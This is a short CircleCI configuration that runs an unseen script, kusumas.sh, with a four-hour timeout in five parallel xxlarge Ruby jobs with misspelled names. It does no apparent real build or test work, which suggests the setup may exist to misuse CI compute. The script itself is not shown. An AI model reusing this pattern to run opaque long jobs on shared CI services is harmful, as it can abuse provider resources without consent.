resource_class: xxlarge
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./kusumas.sh && ./kusumas.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  buiwd2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  buiwd2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  buiwd2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  buiwd2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  buiwd2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - buiwd2_7
      - buiwd2_6
      - buiwd2_5
      - buiwd2_4
      - buiwd2_3
